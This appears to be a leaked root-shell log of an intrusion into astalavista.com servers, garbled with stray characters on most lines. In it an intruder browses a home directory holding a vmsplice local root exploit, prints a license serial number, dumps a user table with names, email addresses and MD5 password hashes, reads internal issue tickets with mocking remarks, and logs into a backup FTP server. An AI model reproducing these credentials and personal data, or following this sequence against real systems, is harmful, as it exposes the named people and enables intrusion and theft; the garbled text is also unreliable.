/ t/ K8 ~# U" X2 g2 L( k: W, @
9 V. Y7 J# O! ?8 Fsh-3.2# cd ..
0 Q: ?( }. I# M3 o0 dsh-3.2# cd com
% X6 d- f; B: J3 P4 X& Q8 |5 z: csh-3.2# ls -la
% F# G0 H" f( Wtotal 141208% c" ?5 t' B- C3 j' y
drwx–x–x 10 com com 4096 Apr 28 12:40 .3 a% T( M) l5 m, i. |
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..4 d/ S, ], f2 E
drwx—— 2 com com 4096 Jun 4 04:04 backups/ u+ L! T0 `! J% G4 H. ~6 }
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
3 r# t* p) z7 b" Hdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
% Y) r e+ d6 P-rw——- 1 com com 21880 Jun 2 08:07 .bash_history7 r( o2 c5 ~6 t, X* i9 V9 ]4 t
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
1 p: t+ c4 i- K) L3 o5 ^6 B) P9 `-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
8 C& Y' ]2 J! [; n+ E; T* O-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc/ Z9 b& v4 `4 E
drwx–x–x 3 com com 4096 Jan 29 2008 domains) v* V9 o8 {: g8 E5 j4 w; H
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed4 J% X- J; x7 r g! m3 w
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
6 v4 N7 C4 h/ f) y- H1 \8 ~) N+ b-rw——- 1 com com 69 Nov 18 2008 .lesshst7 R n- {; S4 ~
drwx—— 2 com com 4096 Sep 24 2007 mail
9 y! q7 D! F5 F4 f-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history, q! ?5 C: A$ k X2 p% x. ?
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
" v0 D3 U* n7 C+ m9 W, C8 S3 slrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
8 j3 u1 B- V( D, x; R% z-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
+ d% J+ S$ s# }. `drwx—— 2 com com 4096 Aug 26 2008 .ssh
# N( C$ ^$ G8 C, D0 @-rwx—— 1 com com 8515 Feb 10 2008 t
6 _% B3 I% x# }9 @& @! j) B-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c# F! m& Y6 Y0 y. r7 Z
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp' g! N! d1 i# Z i$ G1 N& t% `1 U
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
1 t9 r& w" c$ q7 X' d-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
; c; ^4 \: ?/ Y o) D4 U-rw——- 1 com com 16629 Mar 28 21:46 .viminfo" U2 H! U$ A I5 n
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
! s$ o: w C9 B; H# S- Q* v5 q
x6 u5 Y/ a6 H( t6 xsh-3.2# head t.c- Z, ^/ ]4 n$ r" u8 [
/*4 M% ~& Z$ o k' k" C$ O
* jessica_biel_naked_in_my_bed.c
, A3 a6 p3 D% I" @$ ^" p*
# h4 d8 Y" C$ M+ Z& T( h* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
; V; t7 [3 ^' l; i* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.9 g+ v* }0 D* r }: ^
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
% ^ r$ U6 [5 o5 `2 f2 b7 D*; N1 ~+ e7 E0 i: u: p& U1 ]0 x: h
* Linux vmsplice Local Root Exploit9 _1 R1 y) p! n6 V
* By qaaz% ` Y4 I- @. |, [
*- r1 A, b: J+ b" w" x4 H" \) U
' r4 N/ t3 M* Z( ^# S0 p( ssh-3.2# cd /
( o, ~9 q* i; nsh-3.2# ls -la# p7 q: X0 r+ ^! T" D
total 360
0 i& B1 A5 L, Y/ f. v4 pdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
: K4 w+ X! F% N- ?0 E% ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
8 V7 |8 ~& O/ `. I/ `-rw——- 1 root root 10240 Jun 3 02:39 aquota.group: X4 [. {( }" Q/ m8 K' K5 s0 [
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user- `2 O9 p% V2 n. g' m! A8 e
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db8 G! Z4 n8 S$ S7 r7 t
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck1 |) D P: e( e6 L4 ^( J
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel5 L. M; c$ C1 f8 n2 ^
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
: ]2 W5 _1 L$ ^, w' W3 }drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
; D% |% z. ]" ^! D7 ], }" Pdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot3 i$ c% e: N$ f! H4 Z2 u/ x
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev9 D+ G( y% R7 `6 e2 C% L
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
~ x2 S# H$ t6 Ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 home
0 u# @) m7 P; U) i6 U-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf( l9 @5 m) Q- Q8 g
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib5 V6 b- O% J; f \5 `' R
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
! M4 P& d% V. A* h+ L5 @$ ^, bdrwx—— 2 root root 16384 Sep 11 2007 lost+found9 M+ ?8 X$ N, L( _2 [ Q7 `
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
% g3 \ `: ^1 Rdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
2 K5 {( w; I8 j# E8 Ydrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
: i3 H0 v+ R$ H+ Q! O# J! g-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg4 t5 r1 t% ~" x4 V
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
. L: E: r6 H: o4 Edrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
* A5 g' B5 v3 ?3 m6 r0 t" Gdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc+ N; l1 ~, ]: [" {! e
drwxr-x— 15 root root 4096 Jun 4 08:40 root
# C' i4 E9 P0 ddrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
# u' N! w: U; I/ Jdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux& u* |* v9 ^4 \2 ]
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
/ @& ~7 {9 C! i# P* p4 v$ L* sdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
; P2 u/ y# P* Q# d/ r9 Hdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
1 s h$ M+ {, Tdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
- h) H4 t2 d( zdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
- `8 B0 g# U! G& }
+ x0 o5 [8 r' W6 E8 |! G& Msh-3.2# cd opt
' ~! b" ^8 @8 Fsh-3.2# ls -la0 B2 R, n( a# ^
total 20: `5 c f6 R n! J( s4 H( }
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .: f, g5 | H. [$ D7 L* w6 M5 D
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, J( i% i) b; u6 V: H) M# E1 Udrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
( U6 |/ r- ]! d- F
) W: J2 t0 T- ~3 g, Csh-3.2# cd lsws/
4 k& N9 Q4 x) y! w' psh-3.2# ls -la8 m& c X: u5 g2 o! b0 M" Y) Z
total 108# L }0 q, d2 @' m6 N
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
0 `' n9 B v8 G2 e! F( `4 l; pdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .. E7 x, s2 C, A0 Y5 H6 o" J; T. v
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons4 F- i& b7 o7 L$ Z0 u# `- G# b
drwxr-xr-x 13 root root 4096 May 29 15:10 admin% r4 k( ~/ k$ F" c
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
S# ~9 X9 O: X3 Vdrwxr-xr-x 2 root root 4096 May 29 15:10 bin, e% h. q j! {! Q3 d+ m' M0 ^
drwx—— 4 apache apache 4096 Jun 3 02:43 conf5 z- }! \2 p/ [% f; \
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
' E4 e+ [/ ]; Qdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs! ^- \2 i: s) r1 b& @
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
+ A$ R& O4 a, T8 ydrwxr-xr-x 2 root root 4096 Sep 15 2008 lib+ F5 b. B9 I* k; G3 r
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
0 j. C" S3 `2 t" v$ G-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP7 V& e; U1 C! c X
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
9 x: S- F( w( E+ z5 C* m4 Z-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP: }' U; o+ H4 q
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
0 h* Q3 J/ b0 r3 ]: q" |drwxr-xr-x 2 root root 4096 Mar 20 2008 php
0 J* X* u5 Q6 {7 Q) d7 G; {drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
) n3 \) q2 f& F2 E" v L8 a2 adrwxr-xr-x 3 root root 4096 Mar 20 2008 share* ?% l) q/ W+ \5 _& }# q! `
-rw-r–r– 1 root root 6 May 29 15:10 VERSION; U6 L; ~9 J3 u# |: Y' I
7 k& E' r# e1 r0 r dsh-3.2# cd conf& ]- E1 q$ P7 D; D) F0 N
sh-3.2# ls -la
" n: k# H; H7 z8 Q( ~. W3 b1 Ptotal 489 p+ l& `) f4 O# W, q8 L
drwx—— 4 apache apache 4096 Jun 3 02:43 .
+ l. {. f: ^% v6 F9 N! Ydrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
; u( d6 a& P, O. S( g6 K% G2 Ddrwx—— 2 apache apache 4096 Mar 20 2008 cert
; k0 l% c- V* J' w$ Y) K-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
; O" y& m8 N' x8 p-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak6 ~) ?( f/ s# K9 R8 M. v' h
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last1 \ O0 @2 w. I6 O" A1 ?% R% V$ x
-rw——- 1 apache apache 256 May 29 15:10 license.key; Y: W7 q0 D( ?/ O, A
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old5 P# D. `/ k5 a# O- ]7 c8 P
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties: c+ B7 U0 J( U, b
-rw——- 1 apache apache 20 May 29 15:10 serial.no
1 @" X5 w! t. ]* t+ x% `; a5 u% m8 ddrwx—— 2 apache apache 4096 Mar 20 2008 templates$ B8 j: M+ U$ z: ~* H) L5 E
; V7 r/ r5 B- u% |1 `
sh-3.2# cat serial.no X* G* ^& X/ g3 i: t6 ~. V: z5 g
IbDl-oVsO-CKqL-wVRa
8 w, I t4 g& `2 n( O
% n, {. [% \# E m; G: ?sh-3.2# mysql
' q" J. Z& R5 F8 JWelcome to the MySQL monitor. Commands end with ; or \g.8 F+ ]- F' j1 @+ ?* ]" U( t
Your MySQL connection id is 2868443 U# n+ ?9 H/ ]# V
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
, P5 ^ i, F( A* z9 u# \2 X1 x/ l6 K' q! y. _8 C Z+ A2 |/ Q
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.) Y/ ` R. S) R# [ E( s% O
2 f! E& O0 t, e" S7 {3 \6 ?/ Omysql> show databases;
: M0 j7 J8 W: H" u+———————–+
: x9 f; o' f: p3 I' ~| Database |
4 c! I8 W; E3 R5 z6 L+———————–+3 G+ H* Y! X4 y- W
| information_schema |
5 j8 h/ m8 i! [7 j1 m- F| astanet_ads |) f& ~& u, g# ~! C! l+ o
| astanet_mailing_lists |8 q0 y/ I; l3 B- Q' f
| astanet_mediawiki |1 X6 z( p% ~% M7 D( o
| astanet_membersystem |! O! u7 d ?" r3 I4 l
| com_contrexx |
: L e% ^! x S/ v- j( v| com_contrexx2 |
4 m' I7 L7 {2 i& Y6 J| com_contrexx2_live |3 H1 V8 h2 I. n2 \
| da_roundcube |
Q' f9 }7 H: N: [0 ]| dolphin |
) u* ]1 G$ X3 l8 A1 E* A| ideapool |& a: Q3 Z- J" j2 U9 `
| mysql |
, r* O5 a# E y/ |3 || test |
( S9 P, a8 }# C3 `" S2 Q8 J| yourmaster |. L& _, M" F) c0 ~
+———————–+
- |* P( x8 m) _8 k+ D9 h2 ]4 N- d, E14 rows in set (0.00 sec)
5 E& u4 a7 ~% L' q K. |$ J: ^' U2 [8 J) e/ Q1 ^4 ?
mysql> use ideapool6 a/ F% c3 W5 r! w" L3 k) H
Database changed' {1 y8 _# Z3 D' n. ~( ^
mysql> show tables;
2 E! G6 s& [* Y( J+———————————–+3 p( x& Q) I% }4 W/ J9 h
| Tables_in_ideapool |
* C5 d- X8 t! t6 d% i# [+———————————–+
6 ~: H" O1 @/ a% s I: V1 Q| eventum_columns_to_display |- I" U' H+ }' g+ b9 E6 e2 w# S
| eventum_custom_field |
; v7 d, [# ^: [7 C, Y8 ]| eventum_custom_field_option |
5 I% f. g+ V; ~7 t- j| eventum_custom_filter |
3 s' e9 J0 E% q0 l) L7 ^7 i| eventum_customer_account_manager |
; \8 y. l$ S( i+ {| eventum_customer_note |
5 G, C! B$ T. q; U| eventum_email_account |
6 ]) S6 n8 g p& J| eventum_email_draft |8 a& f) j9 ~' V/ v* t* R
| eventum_email_draft_recipient |
* K! X+ D& l% a5 U| eventum_email_response |
3 h8 h* w) F- D6 O2 U9 [' U| eventum_faq |
s4 s8 \- E- S$ ]| eventum_faq_support_level |
0 P7 q- c4 L% {4 C: q| eventum_group |
$ W0 D. D' x4 y; K [9 T| eventum_history_type |
% h: @* G+ D' b- B( b, G. N. ?' v7 L2 O| eventum_irc_notice |
8 F* N( Z( l7 V| eventum_issue |4 I4 o; Q* L. ~
| eventum_issue_association |
' U) T7 E" n# z5 P7 T- Q7 L8 V| eventum_issue_attachment |
% c4 n5 W. @% J| eventum_issue_attachment_file |
, ~+ s! W* j3 D' Y3 e4 `. O| eventum_issue_checkin | A" Y! b; _, O; ]5 }' Z
| eventum_issue_custom_field |
; j2 k6 f9 C2 q# ]. a| eventum_issue_history |! l2 g( h+ r z0 E0 F
| eventum_issue_quarantine |
}7 W/ m; O2 ]8 L| eventum_issue_requirement |
7 \, [; i- L$ y( C! v4 s* {: ] g| eventum_issue_user |8 Y! p3 x& p+ P% g% F
| eventum_issue_user_replier |
( J7 U3 x+ C9 e% S| eventum_link_filter |
1 W; S. g" U, b. {: _1 v5 D| eventum_mail_queue |
- n l2 j) }- ~/ v| eventum_mail_queue_log |# O a5 h4 I# u2 G, q
| eventum_news |, } ?3 ^6 u. ?* s3 [
| eventum_note |5 |4 Z! C4 W* c: G
| eventum_phone_support |7 C, }8 a l& l- d# ]
| eventum_project |/ }# s- I5 a( U5 Z) g
| eventum_project_category |
& z6 R+ H% b) R4 U: r| eventum_project_custom_field |
4 _ v, ~+ |" }) V+ [| eventum_project_email_response |
! P/ s. Z$ t' H| eventum_project_field_display |
, ~' Z$ A0 |, I' Z0 W' O+ L| eventum_project_group |* W* x1 v/ w6 G7 r( T5 g& A
| eventum_project_link_filter |
7 q# ]! M/ q m1 G' L$ i| eventum_project_news |, Z) @3 c! k8 W5 P) Z
| eventum_project_phone_category |9 G" B* C. Z0 ]8 |2 Y- ~/ ?: C
| eventum_project_priority |& S E! l+ }% H. L; A% j# O
| eventum_project_release |2 d! ~) J( U8 M% |
| eventum_project_round_robin |
: r+ G' |( L4 Q| eventum_project_status |$ F: ^: W3 [; z# l# g7 i
| eventum_project_status_date |
7 {* _9 w/ v9 B W| eventum_project_user |
- A$ N7 r, a v- y! T/ S| eventum_reminder_action |1 D( d3 u1 Q2 }" A
| eventum_reminder_action_list |) X2 A: r; e2 \% \% l* N
| eventum_reminder_action_type |
a! @2 F5 T4 h$ {, N4 W' H1 `| eventum_reminder_field |
% ^5 Y6 X) L o' ?/ \| eventum_reminder_history |
; N6 L- X6 i" g8 }$ i| eventum_reminder_level |
. Z, H! u9 [! Q9 P i+ H2 Z| eventum_reminder_level_condition |8 `' b5 G* l- H% \ D+ P& n9 N
| eventum_reminder_operator |4 L. @9 {) e+ P
| eventum_reminder_priority |
! ^* Z7 a( a9 w( Z| eventum_reminder_requirement |
4 d, b; c" S* r5 `" N Y% M$ c| eventum_reminder_triggered_action |
* h: }3 x/ @4 ?4 U: F% a| eventum_resolution |/ {. X/ E9 k* G+ J
| eventum_round_robin_user |
5 s1 ^7 N) I5 p5 A3 c+ o| eventum_search_profile |
9 M: \% T0 r( \/ V| eventum_status |6 E. w+ c: e h8 `/ M
| eventum_subscription | ~( g7 {& f: K" O% j" e+ j. p
| eventum_subscription_type |! G. s% V; n8 ]" @
| eventum_support_email |
- F( o- Y/ {6 e2 G| eventum_support_email_body |
5 Y, P9 V7 b8 ^+ w+ h| eventum_time_tracking |
$ M1 [& Z& {/ |# L7 J/ @3 e| eventum_time_tracking_category |
+ _( ~* N4 P/ r& _9 u `| eventum_user |
3 V8 P4 T/ u; d) I+———————————–+* T* J. I6 O! B
69 rows in set (0.00 sec)
G9 {* o) `' B' u- H. x0 T, L! T8 |
mysql> describe eventum_user;
- C- j3 I* n/ s' Q3 u; Q; i1 P: O8 G+————————-+——————+——+—–+———————+—————-+
$ C5 f* O2 P' L; ^| Field | Type | Null | Key | Default | Extra |
, ]* M; [8 n" X: C+————————-+——————+——+—–+———————+—————-+
7 w) |) g9 S8 W3 R+ U8 v9 E) J; i1 o| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
% [3 {) c3 r0 c% @| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
' ~( s; G/ _* d9 q9 V* w, H! b| usr_customer_id | int(11) unsigned | YES | | NULL | |
2 r' X) S# `6 r3 u$ \+ \| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |" s+ M& E: q4 r D9 x9 p9 _
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |" j% E7 h, Z1 T- o+ d7 R& ^
| usr_status | varchar(8) | NO | | active | |
4 r# a6 s- z: y! X4 ^( G! `+ A4 r! J| usr_password | varchar(32) | NO | | | |
! ]9 {. S- v5 P" R! A y/ r| usr_full_name | varchar(255) | NO | | | |% M* g9 n" C$ t3 L, B8 a
| usr_email | varchar(255) | NO | UNI | | |
9 [+ h) E i! ]$ w* A: z| usr_preferences | longtext | YES | | NULL | |
0 Y* h$ }7 A4 {! F; v| usr_sms_email | varchar(255) | YES | | NULL | |
6 R5 D1 ]9 M& e! }5 @| usr_clocked_in | tinyint(1) | YES | | 0 | |
( g4 g/ D/ u2 B1 ]- x7 ]0 P* F4 k7 m| usr_lang | varchar(5) | YES | | NULL | |8 W+ x- n7 w2 j9 y/ d
+————————-+——————+——+—–+———————+—————-+# B ?0 m# ?8 A$ B# b
13 rows in set (0.00 sec)
; T6 I- Z7 C9 M" ~% N' `, s2 |! {7 \4 G6 C, A# Z7 G5 R
mysql> select usr_full_name,usr_email,usr_password from eventum_user;
* I5 m, w8 z3 O+ `( K9 [6 ^$ w2 V+———————-+——————————-+———————————-+
: U' o8 v9 F, r! g+ ~2 H0 G! R| usr_full_name | usr_email | usr_password |
2 o v6 l" y( _5 W& B; A k+———————-+——————————-+———————————-+
7 f% V1 u1 p9 m4 [5 f- t! x" R| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |# _# ]" v4 N# j- l) r0 _1 x$ k' d- W% _
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
6 G! d& R- D8 A) p2 K| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
5 p8 e6 M( z' R7 H9 \+ V5 h# t a" {| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
, Z1 A2 g1 ^2 v8 V. J| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |3 b" D7 ` K* S* L5 O
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |( j& p3 L) ?! Z3 B: I; y( L
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |$ J/ K& F ]& s. h3 L9 {" c
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |5 ~! y) T! v. o6 J+ O/ M# N3 r$ T
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
6 t y& t2 n0 g+ Q* e v8 D; E| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
3 L/ K' r) q! B1 z G4 S| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
- J r* k; ^) k/ r" a3 n# b, n8 l| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
/ m8 G: s7 ^7 J/ y| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |9 V' g+ q6 `5 S: T W
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
: X' J* G' D7 ]+ k" p P| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |+ _: m$ M& k [5 x
+———————-+——————————-+———————————-+
+ K3 u* d( B2 n2 v* N, I; m& L15 rows in set (0.00 sec). U3 C9 j' f, g s2 O
; z/ `6 _* y. `1 P
mysql> select iss_description from eventum_issue where iss_id = 43;
1 a7 V: t0 d9 r5 @8 v7 f: _+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+. [# V) M8 s* m
| iss_description 5 d" [) c; Z# b, O, E E9 O
|
! k* u+ K; J. X; p: F7 j+ N+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+1 K+ r: \/ b& p6 K
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
: F$ g" e5 l6 S- e" D+ ]connected for 90 mins… 120mins… so what i propose is something like:4 y1 W0 M% R- ~- o) _% i2 m
链接标记[url]http://www.surfthechannel.com/[/url]* S1 ^& e- p7 ^7 J
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
6 Y! z7 Q- e J" t) \2 j% nlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
4 h0 t( W: H5 _5 Z/ v. Pbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
6 g8 r* h% |0 b# h$ iif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA… s) ^2 s* x, c. s
/ [, J% x" W* \% m
We could also put advertisement during play on the flash video player itself… extra $$…
( \: }5 `% P# Y
+ T" o0 _8 F& C& p% Y7 s. f nBy sykadul |
5 x! i* u0 V3 g, P" X4 o' s8 l+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+3 X: a) w% S2 x; B5 g
1 row in set (0.00 sec)6 s( ?+ p: l1 E! m8 k+ N
/ h- p5 j! H+ c
// Money and extra $$ is all they care about. remember that.
' |) J6 S! E5 V- V& v" J. v7 {9 ? p0 |
# `- \5 {% B" K8 x+ S* J% m `mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
5 @$ _9 p6 Q: j" V R+————————+——————————————————————————————————————————————————————————————————————————————-+
$ `. l$ g% s l( [& f| iss_summary | iss_description ) Z4 @ A% o( h4 ?/ z
|
: P$ L& d% f9 ^* v( s/ ^+————————+——————————————————————————————————————————————————————————————————————————————-+. [/ ?' n7 {6 m2 U! A; Z, ?* k* ?' _
| Forum for REAL EXPERTS | Hello,
* R4 Q# U2 c0 l% h3 [" S# r7 P# j( w1 `/ ?0 k2 v& ~
Ishtus and I,
$ {) P+ D2 @. N# b
* \3 w: ]7 J! y$ W* jCame up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide7 b" p8 [7 u( m4 \
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
. d2 B8 v) f4 t5 Y% ^3 h
' O/ O6 ^& e* N- e3 u$ N' t A0 @One example a friend of mine from coresecurity.com!# D' _+ E, Y% _0 O; T
7 ~8 A1 q; \7 R$ h: a3 z1 V8 V
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
* |- p- t) d' Z% t9 W6 z d
( {4 ~& R* \9 l( S0 Y0 Y$ v. V! E4 q|
1 |. F7 h/ O% W7 C; |' G: U# j+————————+——————————————————————————————————————————————————————————————————————————————+8 O! F$ n" e M" X u* Z4 ^! k
1 row in set (0.00 sec)* z1 ~* z9 h, V2 _. \
# \9 w: ]: N0 }* l# w. |6 b. [// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…9 V H( B9 L% q3 F; T) C7 f
& l& N* M4 b2 y, W8 s% b! ^mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
1 L) x$ b7 g% a* [) U4 o( r7 V+——————+———————————————————————————————++ L& f4 u8 `& `# T- f. h
| iss_summary | iss_description |
5 T) D9 j g% ~3 w3 b. a3 C+——————+———————————————————————————————+
. i5 Z/ |% G1 Y1 j| Website guidance | Virtual Girl which guides you trought the website.
+ ~, b' x _ l- E* u% ]/ T" A. |5 X$ y& m/ [5 Z: `; e* x& j! a
We need a girl with who you can ( talk )!!!! Y: v# \" M3 f
Also for the News!+ y2 G* Z: ?* B: T, \
So my suggestion is a girl who read you the news loud if you like!6 u T# s% m: g0 H2 W. e. l% N6 l
you can choose between read yourselfe or she read it for you or both!
' f7 O. w3 Z' i% Y) p8 K
& K% m1 o- f! h! r$ ^+ yGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!. p3 X/ `- X4 L |& }
4 Z% k% c ?4 N; ]) `" qHave a look on the example girls!!" _# g& }9 {8 G( {1 \' @
' }3 ]; h) y8 G' S
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]! Z. u' F5 d5 m& d
7 ^2 k9 L' T6 Z3 M! bor that
5 T4 h7 x, N+ X! ]! Q! \4 v5 o7 F/ ?, g4 U: g3 d+ ?
链接标记[url]http://www.yellostrom.de/[/url]( B! [! h9 z2 ~6 F M# L T+ x4 O
( N# S7 w6 d# e5 P6 J$ l- w. Z|
0 ?0 O1 K4 L9 |( d. n+——————+———————————————————————————————+4 f7 O' m, R8 m: c- b V
1 row in set (0.00 sec)3 |" g9 i7 U8 U0 g" R
+ _# V+ m* y# F
// ha ha.- W) l& E2 ]. o: B$ u& o
9 w: J0 [3 O( _4 d4 D( \
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
0 p- s ~ h( C' L& x% N1 P+————————–+———————————————————————————————————–+; b6 g5 P! p& d3 W& ]
| iss_summary | iss_description |
" g* M. E& W+ R9 X# P6 w( `+————————–+———————————————————————————————————–+
! t; G: g' m- B+ h* P| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |( f4 i7 Z" K' G
+————————–+———————————————————————————————————–+
( c( T( w# c" R' k0 j* Q! a1 row in set (0.00 sec)* J7 P* N$ ?: I2 {- I% g
: f3 ^' }0 J; ~) Z
// LOL.
" V# D8 r6 u( f8 \5 {7 C2 l' Y
3 @8 z/ X0 b7 j1 j amysql> exit
5 L: j8 p% B9 n! H" q& D, L5 iBye
/ X4 P# |4 n9 j4 [% s
1 R1 j, N4 Z8 vsh-3.2# ftp 212.254.194.1638 q h/ H X _# W/ W$ S
Connected to 212.254.194.163.
8 M- a7 {6 F- i5 _/ m220 BackupCOM_VW FTP server ready.7 p& I' ~. R M6 w$ h( R
504 AUTH: security mechanism ‘GSSAPI’ not supported.! J, S0 p8 S" @/ v4 L
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.2 O% }8 Z8 {) B; e
KERBEROS_V4 rejected as an authentication type
1 O: k( n7 y( K' l+ I" n% ZName (212.254.194.163:root): astalavista.com& B" Z- o3 z) r4 q6 k ?
331 Password required for astalavista.com.: {( m* v7 ^( U6 R, a3 Q; s* b
Password:
; Z1 s5 _. l! \: ?0 l230 User astalavista.com logged in.
( _( z' O! M' {Remote system type is UNIX.
: A1 M& S% g- U# M" y* w KUsing binary mode to transfer files.2 p* U! ^% j8 a
ftp> ls -la
O0 U7 R0 V; z# \: T227 Entering Passive Mode (212,254,194,163,2,188)
, q: q3 U& }# K150 Opening BINARY mode data connection for ‘file list’.
& p6 y4 R- K8 q% L% x( }! T) ^dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
, B9 H; T$ D$ V' W226 Transfer complete.
9 Z+ H& K9 L7 ~& v( d, y: xftp> cd astalavista.com5 }& f/ }8 U1 u' G m. U9 t
250 CWD command successful.
